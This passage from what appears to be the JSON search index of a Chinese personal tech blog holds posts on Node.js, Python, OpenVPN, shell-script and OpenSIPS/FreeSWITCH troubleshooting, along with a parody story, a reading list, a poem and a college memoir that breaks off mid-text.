https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.","title":"离线安装nodejs"},{"content":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”\n","permalink":"https://wdd.js.org/posts/2021/05/rhan2i/","summary":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”","title":"用古龙的手法 写我只会心疼哥哥"},{"content":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.8.2 (default, Dec 21 2020, 15:06:04) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information. \u0026gt;\u0026gt;\u0026gt; import sys \u0026gt;\u0026gt;\u0026gt; print(sys.path) [\u0026#39;\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python38.zip\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/lib-dynload\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages\u0026#39;] ➜ pip3 -V pip 21.0.1 from /usr/local/lib/python3.9/site-packages/pip (python 3.9) 问题3: python3.9在哪? 通过上面的命令,就说了我的电脑上有python3.9, 那么实际要克制行文件在哪里呢?\n一般我是用brew安装软件的,brew list\nbrew list - python@3.9 brew info python@3.9 Python has been installed as /usr/local/bin/python3 Unversioned symlinks `python`, `python-config`, `pip` etc. pointing to `python3`, `python3-config`, `pip3` etc., respectively, have been installed into /usr/local/opt/python@3.9/libexec/bin 上面的输出中,有两个路径\n/usr/local/bin/python3 试了下这个路径没有文件 /usr/local/opt/python@3.9/libexec/bin 这个文件存在 ➜ bin /usr/local/opt/python@3.9/libexec/bin/python -V Python 3.9.2 将python3 设置为一个别名\nalias python3=\u0026#39;/usr/local/opt/python@3.9/libexec/bin/python\u0026#39; source ~/.zshrc\npython3 wave.py,\n问题解决。\n","permalink":"https://wdd.js.org/posts/2021/05/blzt8r/","summary":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.","title":"python ModuleNotFoundError"},{"content":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","permalink":"https://wdd.js.org/posts/2021/05/appxev/","summary":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","title":"5月书单"},{"content":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg\n","permalink":"https://wdd.js.org/posts/2021/05/kakgg7/","summary":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg","title":"openvpn 报错"},{"content":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来放佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头\n","permalink":"https://wdd.js.org/posts/2021/04/gbx6x5/","summary":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来放佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头","title":"不曾忘的一首小诗"},{"content":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好久遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在与第一行的这条语句。\n一般情况下我们都是写得/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会抱语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到的难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以上他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能收到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory. \u0026ndash; Wheeler\n总之,我们如果在学习时能够把知识传授给别人,对自己来说也是一种学习。\n参考 https://www.zhihu.com/question/20576786 https://baike.baidu.com/item/%E8%B4%B9%E6%9B%BC%E5%AD%A6%E4%B9%A0%E6%B3%95/50895393 https://www.quora.com/Learning-New-Things/How-can-you-learn-faster/answer/Acaz-Pereira https://www.scientificamerican.com/article/pioneering-physicist-john-wheeler-dies/ ","permalink":"https://wdd.js.org/posts/2021/04/zl6rpy/","summary":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好久遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在与第一行的这条语句。\n一般情况下我们都是写得/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会抱语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到的难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以上他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能收到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory.","title":"从/bin/sh到费曼学习法"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/ch8/fork/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, seeFSCORE-392.\n参考 http://lists.freeswitch.org/pipermail/freeswitch-users/2018-April/129473.html https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files https://tools.ietf.org/html/draft-ietf-sip-100rel-02 https://nickvsnetworking.com/sip-extensions-100rel-sip-rfc3262/ ","permalink":"https://wdd.js.org/opensips/ch9/100-rel/","summary":"sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission.","title":"sbc 100rel"},{"content":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) != 0) { LM_WARN(\u0026#34;cannot find the phone!\\n\u0026#34;); return -1; } LM_INFO(\u0026#34;zone:%s\\n\u0026#34;, zone.s); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-3/","summary":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) !","title":"ch4-3 $var() 类型的传参"},{"content":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,而来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师在也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上换了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎我觉得我是个可育之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四时很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不在自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。\n","permalink":"https://wdd.js.org/posts/2021/04/mcgyoz/","summary":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,而来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师在也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上换了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 